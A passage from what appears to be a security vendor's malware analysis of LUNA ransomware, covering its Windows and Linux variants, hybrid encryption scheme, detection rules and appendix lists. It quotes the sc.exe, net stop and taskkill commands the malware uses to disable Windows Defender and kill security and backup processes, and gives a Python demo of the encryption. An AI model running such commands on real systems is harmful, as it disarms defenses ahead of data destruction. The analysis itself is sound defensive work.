observed as other extortion activity groups, like [CUBA Ransomware](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis), have used.\n\n#### Linux Exclusions\n\nOur Linux LUNA sample includes functional but largely unnecessary exclusions leftover from the Windows implementation. These checks are performed in the **-dir** execution flow before a file is sent to the **add_file** function for encryption. As an example, see the **.ini** , **.exe** , **.dll** , and **.lnk** extensions and **OpenServer** , **Windows** , **Program Files** , **Recycle.Bin** , **ProgramData** , **AppData** , and the **All Users** directories below. Of note, while the **.Luna** extension is included in the vestigial exclusions, it is present in both Windows and Linux.\n\n\n\n\n\n| | |\n| ------------------------- | -------------------------------------------------------------------- |\n| File Extension Exclusions | Folder Exclusions |\n| .Luna.ini.exe.dll.lnk | OpenServerWindowsProgram FilesRecycle.BinProgramDataAppDataAll users |\n\nLinux LUNA checks for Windows file extensions and folders and will not encrypt files with the specified extensions on a Linux victim.\n\n\n\n\n\nThe check for the **.Luna** extension is useful in that it prevents re-encrypting an already encrypted file.\n\n### Windows execution\n\nThe Windows sample we found was a more full-featured product that included much of the functionality present in other mature ransomware families. It still includes the **-dir** and **-file** flags, but now if the malware is run without arguments, the Windows LUNA will perform some preliminary defense evasion, file protection preparation, and enumeration measures before entering the **-dir** execution loop. Additionally within the **-dir** execution flow Windows LUNA file and directory exclusions are functional and serve to protect critical system processes from being corrupted by encryption. This is different from what was observed with the Linux LUNA implementation which does not exclude sensitive OS directories or files that can impact system stability.\n\n\n\n\n\nLUNA uses service and process termination to de-conflict any files locked by other programs to successfully encrypt them along with disabling security products that may prevent ransomware execution. It does this by leveraging a built-in Rust process builder ( **std::sys::windows::process::Command::new** ) to call three new processes with their own pre-defined command-line arguments.\n\n- Service Control\n- Net\n- TaskKill\n\n#### Service Control\n\n[Service Control](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config) is a Windows utility used to modify services’ entries in the registry and in the Service Control Manager database. In this case, it’s used to ensure a service that is stopped cannot be restarted and interrupt malware execution.\n\n\n\n- **\"C:\\WINDOWS\\system32\\sc.exe\" config [service] start=disabled**\n - **\"C:\\WINDOWS\\system32\\sc.exe\"** : Service Control executable\n - **config [service]**: Specifies the service (as an example, WinDefend) that will be modified\n - **start=disabled** : Sets the start type of the service to “disabled”\n\nLUNA does not check that a service exists before issuing the service disable command. So it will commonly get [1060 errors](https://docs.microsoft.com/en-us/windows/win32/debug/system-error-codes--1000-1299-#ERROR_SERVICE_DOES_NOT_EXIST) to the console indicating that **sc.exe** attempted to modify a service that does not exist.\n\n\n\nOur LUNA sample attempts to disable 253 different services. See the Appendix: Windows Services Termination List for the complete list.\n\n#### Net\n\n[Net](https://attack.mitre.org/software/S0039/) ( **net.exe** ) is a Windows utility used in command-line operations for the control of users, groups, services, and network connections. In this case, it is used to stop the running services that have already been prevented from restarting by **sc.exe**.\n\n\n\n- **\"C:\\WINDOWS\\system32\\net.exe\" stop [service] /y**\n - **\"C:\\WINDOWS\\system32\\net.exe\"** : Net executable\n - **stop [service]**: Specifies the name of the service (as an example, WinDefend) that will be stopped\n - **/y** : Carries out the command without first prompting to confirm actions\n\nAgain there are no checks that the service is actually running on the victim machine. For Net, this manifests as **2185** errors printing to the console for each attempt to stop a nonexistent service.\n\n\n\n#### TaskKill\n\n[TaskKill](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/taskkill) ( **taskkill.exe** ) is a Windows utility used to end a task or process by the process ID or image name. LUNA uses TaskKill to terminate processes by name that could interfere with the malware’s operation by maintaining file access locks on files targeted for encryption.\n\n\n\n- **\"C:\\WINDOWS\\system32\\taskkill.exe\" /im [process name] /f**\n - **\"C:\\WINDOWS\\system32\\taskkill.exe\"** : TaskKill executable\n - **/im [process name]**: Specifies the name of the process (as an example, msmpeng.exe) that will be terminated\n - **/f** : Specifies that processes be forcefully ended\n\nOnce again, there are no checks that the process is actually running. TaskKill produces “process not found” errors printed to the console for attempts to kill non-existent processes.\n\n\n\nOur sample contained a hardcoded list of 997 processes to kill. See the Appendix: Windows Process Termination List for the complete list.\n\n#### Disk enumeration\n\nNext, Windows LUNA executed with no arguments uses a function called **get_all_drives** to brute-force the enumeration of all the available drives by going through the English alphabet and verifying if the drives are mapped to the machine using Rust library **std::fs::read_dir**. If the volume exists, it will be flagged for encryption at a later stage.\n\n\n\nAll volumes identified are then passed to LUNA’s **walk_dir** function that will drop ransom notes, enumerate subdirectories, and encrypt files similar to the Linux version with the exact same ransomware note.\n\n\n\n#### Windows exclusions\n\nUnlike the Linux version, however, the Windows LUNA file and folder exclusions are respected to prevent making the targeted machine inoperable or inadvertently stopping encryption prematurely.\n\n| | |\n| ------------------------- | -------------------------------------------------------------------- |\n| File Extension Exclusions | Folder Exclusions |\n| .Luna.ini.exe.dll.lnk | OpenServerWindowsProgram FilesRecycle.BinProgramDataAppDataAll users |\n\nWe compared these exclusions with those from our [CUBA Ransomware Malware Analysis](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis#excluded-directories) report. LUNA did not include the file extensions **.sys** or **.vbm** , both identified in the CUBA analysis. Also, LUNA excludes all of the **\\Program Files** , **\\ProgramData** , and **\\AppData** directories and subdirectories, which CUBA encrypts - or has narrower exclusions to subfolders. This seems like an overly broad exclusion methodology as it misses some valuable data that would be disruptive if encrypted.\n\n## Encryption Implementation\n\nLUNA uses a multi-step encryption implementation approach designed to make the author’s decryption tool the only known way to recover targeted files.\n\n### Encryption process\n\nThe malware author generates a public/private key pair before compilation and embeds the public key in the LUNA binary for later use by the malware. The author maintains the private key until the victim has met their demands.\n\n\n\n> In many cases, ransomware actors generate a new “author’s” key pair for each victim organization.\n\nWithin the **add_file** function, each time LUNA encounters a new file to encrypt, the malware will generate its own public/private key pair associated with that file. It does this by using the open source library [x25519-dalek](https://github.com/dalek-cryptography/x25519-dalek) x25519 elliptic curve Diffie-Hellman key exchange with [**RngCore::fill_bytes**](https://docs.rs/rand/latest/rand/trait.RngCore.html#tymethod.fill_bytes) random number generator used for entropy, which is built into Rust.\n\n\n\n> Elliptic curve ([ECC](https://en.wikipedia.org/wiki/Elliptic-curve_cryptography)) key generation offers several performance improvements over [RSA]() for equivalent key size. Generally, for a given key size ECC offers greater cryptographic strength and is faster to derive a public key from a private key. This speed improvement helps when a new key pair is generated for every file to be encrypted on a victim machine.\n\nAt this point, there are two sets of public/private keys: the authors and the malware’s.\n\nLUNA will then use the malware-generated private key and the author’s embedded public key to derive an AES key.\n\n\n\nFiles can then be encrypted by chunk with AES in the counter (CTR) mode and an initialization vector (IV). The hardcoded IV is the string “Luna” padded with zeros to be 16 bytes long as required by the AES-CTR cipher algorithm.\n\n\n\n> [Initialization vectors](https://en.wikipedia.org/wiki/Initialization_vector) are broadly used in cryptography to provide input to initialize the state of the cipher algorithm before the plaintext is encrypted. In most other contexts it is randomized and shared with the public key. This randomization provides a similar function to [salt]() for hashed passwords.\n\nUsing the **std::io::Seek** trait, Rust is able to abstract the OS appropriate **seek** , ie **lseek** for Linux. The malware uses this function to read data from the target file, encrypt it, and write it back to the original file.\n\nLUNA first overwrites the original file with the encrypted content, then appends the malware’s public key created for that file and the string “Luna” as a file marker. The extension **.Luna** is then added to the filename.\n\n\n\n\n\nAt this point, the AES and malware’s private keys are no longer needed and must be destroyed so only the author’s private key can be used for decryption.\n\nLUNA then moves to the next file and starts again.\n\n### Decryption process\n\nIn order to decrypt a file encrypted with this method we need the AES key and the IV. The IV is hardcoded into the malware and already known, however, the AES key is discarded once the file is encrypted. The AES key was initially generated using the malware’s private key and the author’s public key, but the malware’s private key has also been discarded.\n\nWhile we also have the malware’s public key in the encrypted file itself, the author’s private key is required, in combination with the malware's public key, to derive the AES key. The AES key in combination with the hardcoded IV can then be used to decrypt each encrypted chunk.\n\n\n\nBelow you can see a graphic outlining the encryption and decryption process of the LUNA ransomware.\n\n\n\n### Chunk encryption\n\nLike many ransomware families, LUNA encrypts files differently based on size. This serves to enhance performance and allows the ransomware to make a larger volume of data unusable in a shorter period of time.\n\nIf the file is smaller than **320** kB the entire contents of the file are encrypted using the above-described method. If the file size is between **320** kB and approximately **3** MB then only the first **320** kB will be encrypted. For files larger than approximately **3** MB LUNA will encrypt **320** kB chunks deriving the space between chunks by a byte value calculated at run-time based on the file size.\n\n### LUNA encryption POC\n\nIf you're interested in trying this out yourself to see the encryption/decryption process in action, check out Elastic's Malware Analysis and Reverse Engineering (MARE) team's Python POC in the LUNA Encryption POC Appendix. This script illustrates the implementation of the LUNA encryption/decryption mechanism.\n\n\n\n## Summary\n\nThe samples were nearly identical in their core functionality of the -dir and -file execution paths, the encryption mechanisms utilized, and hard-coded values. Hardcoded value similarities include:\n\n- Extension exclusion values\n- Folder exclusion values\n- Initialization vector\n- Author’s public key\n- Ransomware note\n\nThe most obvious difference between the two LUNA samples we looked at is the enhanced functionality of the Windows PE sample when provided no arguments and the adherence to the extension and folder exclusions for Windows.\n\nThere are many differences between the two OS packages; it is probably more convenient to provide a single decryption tool for all endpoints ransomed, irrespective of the OS. A uniform encryption and decryption framework could indicate that the LUNA ransomware is used in a [Ransomware-as-a-Service](https://www.trendmicro.com/vinfo/us/security/definition/ransomware-as-a-service-raas) implementation or that LUNA is provided as a kit that can be tailored to specific campaigns.\n\nThese differences and similarities lead us to the following assessments of these samples:\n\n1. The Windows sample is much more mature than the Linux sample as reflected in the drive enumeration, services disable/stop, process termination, and exclusions employed to enable the malware to be deployed broadly with little detailed knowledge of the victim machines.\n2. The Linux sample contains vestigial Windows features. The exclusions could be modified to fit some specific Linux distributions, but it could be a challenge to create one list that has broad coverage in the diverse Linux ecosystem.\n3. The service disable/stop and process terminate lists are very large when compared to other mature ransomware samples. While it does not impede the encryption function of the malware, it generates a tremendous amount of noise that could alert defenders. Calling **sc config [service] start=disabled** and **net stop** 253 times for many services that do not exist, or **taskkill /im** 997 times for processes that do not exist provides an excellent opportunity to interdict ransomware execution before encryption begins. This would be much quieter with prior service and process enumeration, as is common with other ransomware campaigns.\n4. The Linux sample did not include the safeguards built into the Windows variant. This caused the Linux sample to encrypt files needed to validate entitlements to system files, such as the **sudoers** and **passwd** files. Possibilities, why the Linux sample did not include safeguards :\n\n 1. the malware authors did not have a firm enough understanding of Linux system files and directories to know what should be excluded;\n 2. a time constraint prevented the completion of a mature Linux sample;\n 3. a lack of widely available ransomware exclusions lists for Linux;\n 4. inclusion of a Linux sample was opportunistic because the sample was developed in Rust, which is cross-platform; or\n 5. Linux capabilities were included as a “selling point” for a Ransomware-as-a-Service offering\n\n## Observed Adversary Tactics and Techniques\n\n### Tactics\n\nUsing the MITRE ATT&CK® framework, tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- [Impact](https://attack.mitre.org/tactics/TA0040)\n\n### Techniques / sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\nObserved techniques/sub techniques:\n\n- [Indicator Removal on Host](https://attack.mitre.org/techniques/T1070/)\n- [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)\n- [System Service Discovery](https://attack.mitre.org/techniques/T1007/)\n- [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)\n\n## Detections\n\nOur detection/protection philosophy regarding ransomware focuses on pre-encryption detection when defenders still have an opportunity to interdict malware execution before data is lost.\n\n### YARA\n\nFor LUNA Windows and Linux variants, the [YARA rule below](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Multi_Ransomware_Luna.yar) detects strings embedded in the malware and byte sequences related to core functionality.\n\n```\nrule Multi_Ransomware_LUNA {\n meta:\n Author = “Elastic Security”\n creation_date = \"2022-08-02\"\n os = \"Linux, Windows\"\n arch = \"x86\"\n category_type = \"Ransomware\"\n family = \"LUNA\"\n threat_name = \"Multi.Ransomware.LUNA\"\n reference_sample = \"1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51\"\n strings:\n $str_extensions = \".ini.exe.dll.lnk\"\n $str_ransomnote_bs64 = \"W1dIQVQgSEFQUEVORUQ/XQ0KDQpBbGwgeW91ciBmaWxlcyB3ZXJlIG1vdmVkIHRvIHNlY3VyZSBzdG9yYWdlLg0KTm9ib\"\n $str_path = \"/home/username/\"\n $str_error1 = \"Error while writing encrypted data to:\"\n $str_error2 = \"Error while writing public key to:\"\n $str_error3 = \"Error while renaming file:\"\n $chunk_calculation0 = { 48 8D ?? 00 00 48 F4 48 B9 8B 3D 10 B6 9A 5A B4 36 48 F7 E1 48 }\n $chunk_calculation1 = { 48 C1 EA 12 48 89 D0 48 C1 E0 05 48 29 D0 48 29 D0 48 3D C4 EA 00 00 }\n condition:\n 5 of ($str_*) or all of ($chunk_*)\n}\n```\n\n### Endpoint rules\n\nFor Windows LUNA there is the opportunity to prevent execution before encryption in the “no arguments” execution flow. As outlined in the previous sections, this execution flow attempts to disable and stop 253 services and terminate 997 processes whether or not they exist on the victim machine.\n\nOur Threat Research And Detection Engineering team (TRADE) tuned and promoted [a behavioral endpoint rule](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/defense_evasion_attempt_to_disable_windows_defender_services.toml) targeting these pre-encryption environmental preparation TTPs.\n\nThe below rule identifies and prevents attempts to disable the Windows Defender services.\n\n```\nquery = '''\nprocess where event.action == \"start\" and\n process.pe.original_file_name : (\"net.exe\", \"sc.exe\", \"cmd.exe\") and\n process.command_line : (\"*disabled*\", \"*stop*\") and process.command_line : (\"*WdNisSvc*\", \"*WinDefend*\") and\n (process.parent.executable :\n (\"?:\\\\Windows\\\\Microsoft.NET\\\\*\",\n \"?:\\\\Users\\\\*\",\n \"?:\\\\ProgramData\\\\*\") or\n process.parent.name : (\"rundll32.exe\", \"regsvr32.exe\", \"wscript.exe\", \"cscript.exe\", \"powershell.exe\", \"mshta.exe\"))\n'''\n\noptional_actions = []\n[[actions]]\naction = \"kill_process\"\nfield = \"process.entity_id\"\nstate = 0\n```\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://securelist.com/LUNA-black-basta-ransomware/106950/](https://securelist.com/luna-black-basta-ransomware/106950/)\n- [https://www.virustotal.com/gui/file/1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51](https://www.virustotal.com/gui/file/1cbbf108f44c8f4babde546d26425ca5340dccf878d306b90eb0fbec2f83ab51/)\n- [https://www.virustotal.com/gui/file/ad8d568811e05e12cde78f76c3b7cbbde0d20aee5b4e918a3a8d515f5e242bb6](https://www.virustotal.com/gui/file/ad8d568811e05e12cde78f76c3b7cbbde0d20aee5b4e918a3a8d515f5e242bb6)\n\n## Appendix\n\n### LUNA encryption POC\n\nWe are providing an encryption POC, written in Python, that mimics and visualizes the encryption implementation of the LUNA ransomware.\n\nNote: like LUNA, each time the script is run, the encrypted output will be different because the private keys are generated each time.\n\n**Prerequisites:**\n\n- Pyton 3\n- **cryptography** and **termcolor** Python modules\n\n**Usage:**\n\n- Save the below script as **luna_encryption_poc.py**\n- install the dependencies with **pip install --user cryptography termcolor**\n- execute the script with **python luna_encryption_poc.py**\n\n```\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.primitives.asymmetric import x25519\n\nfrom termcolor import colored\n\n# Malware author generates public key and embeds into malware, keeps private key for decryption later\nauthor_private_key = x25519.X25519PrivateKey.generate() # Unknown author's priv_key generation method\nauthor_embedded_public_key = author_private_key.public_key()\n\n# Malware generates key pair\nmalware_private_key = x25519.X25519PrivateKey.generate()\nmalware_public_key = malware_private_key.public_key()\n\n# Serialization of malware pub_key\nmalware_public_bytes = malware_public_key.public_bytes(encoding=serialization.Encoding.Raw,\n format=serialization.PublicFormat.Raw)\nprint(\"Malware Public Key: \", colored(malware_public_bytes.hex(), \"blue\"))\n\n# AES key generated by malware's private key and author's embedded public key\n# malware_private_key is discarded after this step and not needed for decryption\nshared_key_generated = malware_private_key.exchange(author_embedded_public_key)\nprint(\"Generated Shared Key (AES): \" + colored(shared_key_generated.hex(), \"cyan\"))\n\n# Encryption Step with AES + IV null-padded LUNA string\niv = bytearray(b'4c756e6100000000') # 'Luna....' 16 bytes sized needed for AES CTR\n\n# AES stream cipher (CTR) created using AES shared key and IV\ncipher = Cipher(algorithms.AES(shared_key_generated), modes.CTR(iv))\nencryptor = cipher.encryptor()\n\n# String to be encrypted\nplaintext = b\"You know, for search!\"\nprint(\"Plaintext: \", colored(plaintext, \"green\"))\nprint(\"Plaintext.hex(): \", colored(plaintext.hex(), \"green\"))\n\n# Encryption of string using AES stream cipher\nct = encryptor.update(plaintext) + encryptor.finalize()\n\n# Mock encrypted file with cipher text + public bytes + file marker\nfile_marker = b\"Luna\" # 0x4c756e61\nencrypted_file = ct + malware_public_bytes + file_marker\n\nfile_ciphertext = encrypted_file[:-36]\npub_key_from_encrypted_file = encrypted_file[-36:-4]\nfile_marker_from_encrypted_file = encrypted_file[-4:]\n\nprint(\"Encrypted File contents: \\n\",\n colored(file_ciphertext.hex(), \"red\"),\n colored(pub_key_from_encrypted_file.hex(), \"blue\"),\n colored(file_marker_from_encrypted_file.hex(), \"yellow\"))\nprint(\"\\t\",\n colored(\"Encrypted content\", \"red\"), \" \",\n colored(\"Embedded malware's pub_key\", \"blue\"), \" \",\n colored(\"Embedded file marker\", \"yellow\"))\n\n# Serialization\nmalware_public_key_from_file = x25519.X25519PublicKey.from_public_bytes(pub_key_from_encrypted_file)\n\n# AES key derived from author's private key and malware embedded public key\nshared_key_derived = author_private_key.exchange(malware_public_key_from_file)\nprint(\"Derived Shared Key (AES): \", colored(shared_key_derived.hex(), \"cyan\"))\n\n# Decryption using derived AES shared key and IV\nredo_cipher = Cipher(algorithms.AES(shared_key_derived), modes.CTR(iv))\ndecryptor = redo_cipher.decryptor()\nresult = decryptor.update(file_ciphertext) + decryptor.finalize()\nprint(\"Decrypted plaintext: \", colored(result, \"green\"))\n```\n\nThis Python script will display the malware public key, the shared AES key, the plain text as a string, the plain text as a hex value, the encrypted text, and finally decrypt the encrypted text back into the original plain text as a string.\n\n\n\n### Windows services termination list\n\n| | | |\n| -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Acronis VSS ProviderAcronisAgentAcrSch2SvcAdobeARMserviceAlerterARSMaswBccavbackupBackupExecAgentAcceleratorBackupExecAgentBrowserBackupExecDeviceMediaServiceBackupExecJobEngineBackupExecManagementServiceBackupExecRPCServiceBackupExecVSSProviderbcrservicebedbgBITSBlueStripeCollectorBrokerInfrastructureccEvtMgrccSetMgrCissesrvCpqRcmc3CSAdminCSAuthCSDbSyncCSLogCSMonCSRadiusCSTacacsDB2DB2-0DB2DAS00DB2GOVERNOR_DB2COPY1DB2INST2DB2LICD_DB2COPY1DB2MGMTSVC_DB2COPY1DB2REMOTECMD_DB2COPY1DCAgentEhttpSrvekrnEnterprise Client Serviceepag EPIntegrationService EPProtectedService epredline EPSecurityServiceEPSecurityService EPUpdateServiceEPUpdateService EraserSvc11710ERSvcEsgShKernelESHASRVEventlogFA_SchedulerGoogleChromeElevationServicegupdategupdatemHealthServiceIBMDataServerMgrIBMDSServer41IDriverTIISAdminIMAP4SvcImapiServiceklnagentLogProcessorServiceLRSDRVXmacmnsvcmasvcMBAMServiceMBEndpointAgentMcShieldMcTaskManagermfefiremfemmsmfevtpmfewcMMSMozyprobackupMsDtsServerMsDtsServer100MsDtsServer110 | MsDtsServer130MSExchangeESMSExchangeISMSExchangeMGMTMSExchangeMTAMSExchangeSAMSExchangeSRSmsftesql$PRODMSMQ MSOLAP$SQL_2008MSOLAP$SYSTEM\\_BGCMSOLAP$TPSMSOLAP$TPSAMAMSSQL$BKUPEXECMSSQL$CITRIX\\_METAFRAMEMSSQL$ECWDB2MSSQL$EPOSERVERMSSQL$ITRISMSSQL$NET2MSSQL$PRACTICEMGTMSSQL$PRACTTICEBGCMSSQL$PRODMSSQL$PROFXENGAGEMENTMSSQL$SBSMONITORINGMSSQL$SHAREPOINTMSSQL$SQL_2008MSSQL$SQLEXPRESSMSSQL$SYSTEM_BGCMSSQL$TPSMSSQL$TPSAMAMSSQL$VEEAMSQL2008R2MSSQL$VEEAMSQL2012MSSQLFDLauncherMSSQLFDLauncher$ITRISMSSQLFDLauncher$PROFXENGAGEMENTMSSQLFDLauncher$SBSMONITORINGMSSQLFDLauncher$SHAREPOINTMSSQLFDLauncher$SQL\\_2008MSSQLFDLauncher$SYSTEM_BGCMSSQLFDLauncher$TPSMSSQLFDLauncher$TPSAMAMSSQLLaunchpad$ITRISMSSQLSERVERMSSQLServerADHelperMSSQLServerADHelper100MSSQLServerOLAPServicemsvsmon90MySQL57Net2ClientSvcNetDDENetMsmqActivatorNetSvcNimbusWatcherServiceNtLmSspNtmsSvcntrtscanodservOracleClientCache80osePDVFSServicePOP3SvcProLiantMonitorReportServerReportServer$SQL_2008ReportServer$SYSTEM\\_BGCReportServer$TPSReportServer$TPSAMARESvcRSCDsvcsacsvrSamSsSAVServiceSDD_ServiceSDRSVCSentinelAgentSentinelHelperServiceSentinelStaticEngineSepMasterServiceSepMasterServiceMigShMonitorSmcinstSmcServiceSMTPSvcSNAC | SnowInventoryClientSntpServiceSQL BackupsSQLAgent$BKUPEXECSQLAgent$CITRIX_METAFRAMESQLAgent$CXDBSQLAgent$ECWDB2SQLAgent$EPOSERVERSQLAgent$ITRISSQLAgent$NET2SQLAgent$PRACTTICEBGCSQLAgent$PRACTTICEMGTSQLAgent$PRODSQLAgent$PROFXENGAGEMENTSQLAgent$SBSMONITORINGSQLAgent$SHAREPOINTSQLAgent$SQL_2008SQLAgent$SQLEXPRESSSQLAgent$SYSTEM_BGCSQLAgent$TPSSQLAgent$TPSAMASQLAgent$VEEAMSQL2008R2SQLAgent$VEEAMSQL2012SQLBrowserSQLsafe Backup ServiceSQLsafe Filter ServiceSQLSafeOLRServiceSQLSERVERAGENTSQLTELEMETRYSQLTELEMETRY$ECWDB2SQLTELEMETRY$ITRISSQLWriterSSISTELEMETRY130SstpSvcsvcGenericHostswi_filterswi_serviceswi_updateswi_update_64SymantecSymantec System RecoverysysdownSystemTelemetryserverTlntSvrTmCCSFtmlistenTmPfw tpautoconnsvcTPVCGatewayTrueKeyTrueKeySchedulerTrueKeyServiceHelperTSMUI0DetectVeeam Backup Catalog Data ServiceVeeamBackupSvcVeeamBrokerSvcVeeamCatalogSvcVeeamCloudSvcVeeamDeploymentServiceVeeamDeploySvcVeeamEnterpriseManagerSvcVeeamHvIntegrationSvcVeeamMountSvcVeeamNFSSvcVeeamRESTSvcVeeamTransportSvcVGAuthServiceVMToolsVMwareVMwareCAFCommAmqpListenerVMwareCAFManagementAgentHostvmware-converter-agentvmware-converter-servervmware-converter-workerW3SvcwbengineWdNisSvcWebClientWinDefendWinVNC4WRSVCZoolz 2 Service |\n\n### Windows process termination list\n\n| | | |\n| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| a2service.exea2start.exeaawservice.exeacaas.exeacaegmgr.exeacaif.exeacais.exeacctmgr.exeaclient.exeaclntusr.exead-aware2007.exeadministrator.exeadminserver.exeaesecurityservice.exeaexagentuihost.exeaexnsagent.exeaexnsrcvsvc.exeaexsvc.exeaexswdusr.exeaflogvw.exeafwserv.exeagntsvc.exeahnrpt.exeahnsd.exeahnsdsv.exealert.exealertsvc.exealmon.exealogserv.exealsvc.exealunotify.exealupdate.exealuschedulersvc.exeamsvc.exeamswmagtaphost.exeappsvc32.exeaps.exeapvxdwin.exeashbug.exeashchest.exeashcmd.exeashdisp.exeashenhcd.exeashlogv.exeashmaisv.exeashpopwz.exeashquick.exeashserv.exeashsimp2.exeashsimpl.exeashskpcc.exeashskpck.exeashupd.exeashwebsv.exeasupport.exeaswdisp.exeaswregsvr.exeaswserv.exeaswupdsv.exeaswwebsv.exeatrshost.exeatwsctsk.exeaupdrun.exeaus.exeauth8021x.exeautoup.exeavcenter.exeavconfig.exeavconsol.exeavengine.exeavesvc.exeavfwsvc.exeavkproxy.exeavkservice.exeavktray.exeavkwctl.exeavltmain.exeavmailc.exeavmcdlg.exeavnotify.exeavscan.exeavscc.exeavserver.exeavshadow.exeavsynmgr.exeavtask.exeavwebgrd.exebasfipm.exebavtray.exebcreporter.exebcrservice.exebdagent.exebdc.exebdlite.exebdmcon.exebdredline.exebdss.exebdsubmit.exebhipssvc.exebka.exeblackd.exeblackice.exebluestripecollector.exeblupro.exebmrt.exebwgo0000ca.execaantispyware.execaav.execaavcmdscan.execaavguiscan.execaf.execafw.execaissdt.execalogdump.execapfaem.execapfasem.execapfsem.execapmuamagt.execappactiveprotection.execasc.execasecuritycenter